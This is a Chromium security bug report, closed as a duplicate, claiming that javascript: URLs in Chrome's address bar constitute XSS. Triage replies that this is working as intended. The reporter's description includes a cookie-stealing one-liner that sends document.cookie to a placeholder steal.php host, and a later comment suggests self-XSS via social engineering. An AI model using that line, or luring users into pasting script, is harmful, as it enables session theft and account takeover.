
Issue 737651

Starred by 1 user

Issue metadata

Status: Duplicate
Merged: issue 722080
Owner: ----
Closed: Jun 2017
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Security: XSS in all Google Chrome browsers

Reported by morell...@gmail.com, Jun 28 2017

Issue description



VULNERABILITY DETAILS and simple case
The vulnerability is in the Google Chrome address bar.
It allows executing XSS (JavaScript code) and getting sensitive data like cookies.
By running the JavaScript code you can get the data of the site you are visiting at that time.
The following images explain it better.
In this screenshot I get the cookie with javascript:alert(document.cookie).
But a command like javascript:document.location="http://webiste.com/steal.php?cookie="+document.cookie
could steal users' cookies.

VERSION
Chrome Version: [58.0.3029.110] 
Operating System: [macOS Sierra 10.12.5, Android 4.4.2]



 
Attachments:
Schermata 2017-06-28 alle 19.56.03.png (2.9 MB)
Schermata 2017-06-28 alle 19.56.06.png (2.8 MB)
Schermata 2017-06-28 alle 19.57.24.png (1.8 MB)

Mergedinto: 722080
Status: Duplicate (was: Unconfirmed)
This is working as intended; running JavaScript manually in pages you've loaded is not a security vulnerability.

https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability-

Comment 2 by morell...@gmail.com, Jun 29 2017

But it is a self-XSS attack; it could be dangerous with a bit of social engineering.

Comment 3 by sheriffbot@chromium.org (Project Member), Oct 5 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
